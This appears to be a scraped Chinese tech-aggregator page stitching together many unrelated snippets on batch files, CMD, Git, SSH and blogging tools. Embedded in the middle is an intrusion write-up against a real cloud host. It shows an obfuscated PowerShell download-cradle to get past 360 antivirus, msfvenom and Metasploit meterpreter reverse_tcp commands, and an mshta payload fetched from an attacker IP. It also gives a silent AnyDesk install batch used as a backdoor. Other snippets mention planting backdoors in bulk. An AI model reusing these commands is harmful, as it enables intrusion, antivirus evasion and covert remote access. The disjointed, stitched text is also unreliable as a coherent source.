在过去的几周里,一个自称 Avos Locker 的新兴勒索软件家族一直在加大攻击力度,同时努力在其目标系统上禁用端点安全产品。
https://segmentfault.com/a/1190000038525808
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
公司最近发现电费高了,经查看原来是有部分同事下班电脑不关……那么问题来了,我们如何通过技术手段来避免这个问题呢?直接下发策略远程关机是可以的,但怕有误伤;准备推送策略让电脑休眠,毕竟能省一点是一点吗,接着发现这得每天推送一次脚本,并且遇到加班的同事策略就显得呆板了,无法在错过执行时间后继续运行;又考虑了下,想办法更改终端的电源方案,控制显示器关机和睡眠时间,这样只要符合策略系统自己就执行了;继续完善,xp和win7系统更改电源方案命令还不一样;最后决定通过360天擎平台推送批处理脚本,然后脚本根据操作系统执行对应的命令,这样终端电源方案被改了,只要满足对应策略,终端就会自动关闭显示器,进入休眠或者睡眠模式。
Jenkins远程部署,一开始没有任何头绪,想了很多方案. 因为两台机器都是windows系统,所以想到publish over cifs, 但是这个网上资料太少,貌似只能内网使用。又想到了Jenkins 分布式构建,但是Jenkins构建的代码和产物最后自动拷贝到主节点。而远程机器其实是客户方的机器,所以这个分布式构建并不适用。最后还是选定publish over ssh来实现远程部署。
bat文件是dos下的批处理文件。批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下输入批处理文件的名称,或者双击该批处理文件,系统就会调用cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们 [1] 。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。入侵者常常通过批处理文件的编写来实现多工具的组合入侵、自动入侵及结果提取等功能。 链接: 百度百科对于bat介绍.
最近把放下了近大半年的Hexo博客重新拾起来了,写篇文章记录一下。至于当初为什么会放下,其中一个原因是用户体验太差,还需要手动创建移动md文件,仿佛回到了原始社会。其实最重要的原因是自己太懒。最近重新拾起来Hexo博客的原因也挺简单,大脑是用来思考事物的而不是记录事物的,得有一个地方记录平时一些琐碎的想法,公众号和技术博客显然不是太合适。但是一想起Hexo那原始的操作,就有点头大。在网上搜了搜发现还真有一款管理插件Hexo Admin,能以网页的方式管理Hexo博客。看来这个世界还真是由懒人改变的。
相信大家在工作和学习都避免不了快速外网调试。比如微信支付、支付宝支付,消息推送,短信发送,邮件发送等等。都需外网能访问你本地服务器进行调试。 软件下载地址:https://www.ittun.com/ 解压软件: config.yml ngrok.exe startup.bat config.yml server_addr: "ittun.com:44433" tunnels: ssh: remote_port: 51001 proto: tcp: "
adb 链接: https://pan.baidu.com/s/1pdpIc9oXaqvN4lSrVLR_VA 提取码: kxhc
在cmd中用PING命令时,出现’Ping’ 不是内部或外部命令,也不是可运行的程序或批处理文件。
我们节日前机器健康状态巡检的时候,会需要用到批处理脚本。比如常见的要针对一堆线上物理机批量执行命令,查看进程健康状态,有没有设置crontab监控自动拉起脚本,日志有没有异常等等。
本地同步默认分支最近n次的commit信息,克隆默认分支master最近一次commit
在计算机开发领域,命令行工具是开发者的得力助手,能够快速、高效地完成各种任务。在Windows操作系统中,DOS(Disk Operating System)命令是一组强大的命令行工具,用于进行文件操作、目录管理、进程控制等各种操作。虽然现代开发环境提供了图形界面和可视化工具,但掌握常用的DOS命令仍然是一项必要的技能,能够在开发过程中节省时间,提高效率。本篇博客将围绕开发常用DOS命令展开,为您详细介绍这些工具的功能和用法,帮助您更好地驾驭命令行工具,成为更高效的开发者。
Jekyll是一个静态站点生成器,它提供了内容管理系统(CMS)的一些优点,同时避免了此类数据库驱动的站点引入的性能和安全问题。它具有“博客意识”,并包含处理日期组织内容的特殊功能,但其用途不仅限于博客网站。Jekyll非常适合需要离线工作的人,更喜欢轻量级编辑器和Web表单进行内容维护,并希望使用版本控制来跟踪他们网站的变化。
在 Windows 10 上,批处理文件是一种特殊的文本文件,通常具有。Bat 扩展,它包含一个或多个命令,命令提示符可以理解并依次运行以执行各种操作。
即使你以前没有使用过 DOS,你也可能知道它的命令行 shell,即 COMMAND.COM。它已经成为 DOS 的同义词,FreeDOS 为此也实现了一个类似的 shell,称为 “FreeCOM”,但也命名为 COMMAND.COM,就像在其他 DOS 系统上一样。
执行 dos(windows系统) 或 shell(Linux/Unix系统) 命令,参数字符串command为命令名。另,在windows系统下参数字符串不区分大小写。
SSH 为 Secure Shell(安全外壳协议)的缩写,由 IETF 的网络小组(Network Working Group)所制定。SSH 是目前非常可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。
批措置的介绍 扩展名是bat(在Windows NT/2000/xp/2003/win 7 也可所以cmd)的文件就是批措置文件。 首先批措置文件是一个文本文件,这个文件的每一行都是一条DOS呼吁(年夜部门时辰就好象我们在DOS提示.
扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。
cygwin本地安装版离线即可安装,使用十分方便,适合linux、安卓平台软件开发与测试时使用,倍受行业人员和学者们的青睐.
代理服务器(Proxy Server)是网上提供转接功能的服务器,在一般情况下,我们使用网络浏览器直接去连接其他Internet站点取得网络信息时,是直接联系到目的站点服务器,然后由目的站点服务器把信息传送回来。代理服务器是介于客户端和Web服务器之间的另一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。
翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件,存储着这个定位服务平台的相关配置信息,包括MSSQL数据库的用户和密码。 ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯。 0x04 绕过主动防御上线 测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。 powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b) web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话,执行getsystem即可提升为SYSTEM,执行命令如下。 1、生成载荷并编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin cat /tmp/shellcode.bin | base64 -w 0 2、配置监听模块参数 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 155.**.***.16 set lport 443 exploit 3、目标主机执行载荷 mshta http://155.**.***.16:8888/bypass360.hta 注:mshta白名单貌似只能用x86的Payload,执行成功后会自动迁移至32位的rundll32.exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。 0x05 绕过异地登录提醒 虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。 为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。 注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。 @echo off AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password choice /t 10 /d y /n >nul for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。 至此,全文结束,内网就不搞了!!!
Git,最先进的分布式版本控制系统之一,最初是由Linux之父Linus为了更好管理开源Linux系统而开发的一个软件;
本文介绍了如何用批处理快速实现一些常见的计算机任务,包括创建和删除目录、文件,以及管理文件名。通过使用批处理,你可以减少手动操作的时间和精力,从而提高工作效率。
DOS批处理中%cd%和%~dp0的区别 在DOS的批处理中,有时候需要知道当前的路径。 在DOS中,有两个环境变量可以跟当前路径有关,一个是%cd%, 一个是%~dp0。 这两个变量的用法和代表的内容是不同的。 1. %cd% 可以用在批处理文件中,也可以用在命令行中; 展开后,是驱动器盘符:+当前目录,如在dos窗口中进入c:\dir目录下面, www.2cto.com 输入:echo %cd% ,则显示为:c:\dir 。 %cd%的内容是可以被改变的,其内容为
dos是磁盘操作系统(Disk Operating System),是个人计算机上的一类操作系统。
在使用 Windows 系统进行 PHP 开发时,经常遇到一个问题:不同的应用或项目需要不同版本的 PHP 环境。每次切换 PHP 版本都是一件麻烦的事情,而且稍不注意就可能引发版本冲突或者配置错误。于是,我开始思考,是否能在 Windows 的命令行下实现多版本 PHP 的共存,就像 Linux 下的快捷方式那样方便切换呢?
首先,在“开始”菜单中输入cmd,然后右击选择管理员身份运行,这样就打开了一个命令提示符窗口。 然后输入python并回车。如果出现了python提示符(>>>)说明已经安装过了。如果提示“python 不是内部或外部命令,也不是可运行的程序或批处理文件。“(如下图),则说明未安装python。
git add xx 命令可以将xx文件添加到暂存区,如果有很多改动可以通过get add -A .来一次添加所有改变的文件。注意 -A 选项后面还有一个句点。git add -A 表示添加所有内容,git add . 表示添加新文件和编辑过的文件不包括删除的文件;git add -u 表示添加编辑或者删除的文件,不包括新添加的文件。
引言: 命令提示符(CMD)是 Windows 操作系统中内置的命令行工具,它提供了一种直接与计算机系统进行交互的方式。虽然现代操作系统提供了许多图形化界面和工具,但命令提示符在某些场景下仍然具有重要的作用。在本篇博客中,我们将深入了解命令提示符,介绍其功能和常用命令,以及如何充分利用它来完成各种任务。
0,安装VC6英文版。 1,安装WinXP DDK。要完全安装,不然会比较麻烦。 2,安装DS。最好也完全安装,要不也是很麻烦。 3,DS安装好以后,运行"开始菜单"->"Compuware DriverStudio\Develop"->"DDK Build Settings"。第一页DDK根目录那里,一般自动设置好了,如果没有,自己选择DDL的根目录,比如:"E:\WINDDK\2600"。执行下面的Launch Program,打开一个VC的IDE,从这个IDE打开驱动项目,就可以编译了。 4,先不要急
刚开始学习编程的同学有不少喜欢玩脚本的,那么今天我就来教大家如何自制一个简单实用的脚本软件,而在批处理脚本中最常用的便是bat和vbs。那么bat到底是什么呢?
批处理(Batch),也称为批处理脚本。顾名思义,批处理就是对某对象进行批量的处理。目前比较常见的批处理包含两类:DOS批处理和PS批处理。PS批处理是基于强大的图片编辑软件Photoshop的,用来批量处理图片的脚本;而DOS批处理则是基于DOS命令的,用来自动地批量地执行DOS命令以实现特定操作的脚本。这里要讲的就是DOS批处理。 批处理是一种简化的脚本语言,它应用于DOS和Windows系统中,它是由DOS或者Windows系统内嵌的命令解释器(通常是COMMAND.COM或者CMD.
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。
如何将本地项目推送到Github Tip:在本地要安装好Git,官网:https://git-scm.com/ 一个学习Git的好地方:https://try.github.io/ 在线
前提条件,当然是需要打开被远程的 Win10 系统的远程桌面的访问功能...,然后在目标 win10 主机上,使用自带的openssh 软件运行ssh反向代理命令:
如何将本地项目提交到git服务器中
昨天按照大佬的代码,做了一个微信全家福的图片,后面好多人问我是怎么做的,索性我就出个详细的教程吧,我python也是三脚猫功夫,有不对的地方,还请各位大佬手下留情。
Windows 命令在开发工作相较于 Linux 命令并没有那么常用,但是常见的命令还是需要掌握,下面就列举软件开发人员必知必会的命令。
一、git是什么 git是一款分布式项目版本管理的工具 git:分布式 svn:集中式 二、git常用命令 git init 在当前项目的目录下生成一个.git隐藏文件夹,为了跟踪项目代码 git add:将工作区的文件添加到暂存区 git commit:将暂存区的文件提交到到本地仓库(也称分支) git push:将本地仓库快照提交到远程 将本地项目提交到远程的托管平台 常用托管平台:github,码云,gitlab.... 提交到远程仓库之前: 1.在github上创建
exe2hex 将可执行二进制文件编码为 ASCII 文本格式。然后,将结果传输到目标计算机(回显 ASCII 文件比回显二进制数据容易得多)。执行exe2hex的输出文件后,使用或PowerShell(默认情况下在Windows上预安装)还原原始程序。可以使用exe2hex中的内置 Telnet 或 WinEXE 选项自动将文件传输到目标计算机。 Binary EXE -> ASCII Text -> *Transfer* -> Binary EXE
在Windows平台下,批处理可以和Wins系统很好地结合,处理一些简单的任务,比如:重复删除某种类型的文件;开机执行一些特定的命令等。 本文主要介绍批处理的基础语法,包括:批处理常用命令和流程控制。本文是在网友SS1写的博文基础上进一步整理而成,在此表示感谢。 1、关于批处理 批处理文件是一个文本文件,这个文件的每一行都是一条DOS命令。当你编辑好批处理文件并将其保存成后缀名为“.bat”的文件之后,双击该文件或者在DOS窗口键入文件名,都可以执行该文件中的DOS命令。 2、常用命令 echo:表示显示此
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
在日常的计算机操作中,我们经常需要进行一些系统管理、文件操作以及网络配置等任务。而命令行界面是执行这些任务的一种高效方式。在Windows操作系统中,CMD(命令提示符)是一个强大的工具,提供了许多命令来实现各种操作。本篇文章将为您介绍100个常用的CMD命令,帮助您提高工作效率。
无论您是一个经验丰富的开发者还是一个刚刚起步的新手,使用Git来管理您的项目是一个明智的选择。Git是一个强大的版本控制系统,它可以帮助您跟踪项目的变化、合并代码以及与团队成员协作。在本文中,我们将为您提供一步步的指南,教您如何将一个现有的项目上传至仓库。
老司机上车了!!!!!! 我們知道,批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。 一.简单批处理内部命令简介 1.Echo
领取专属 10元无门槛券
手把手带您无忧上云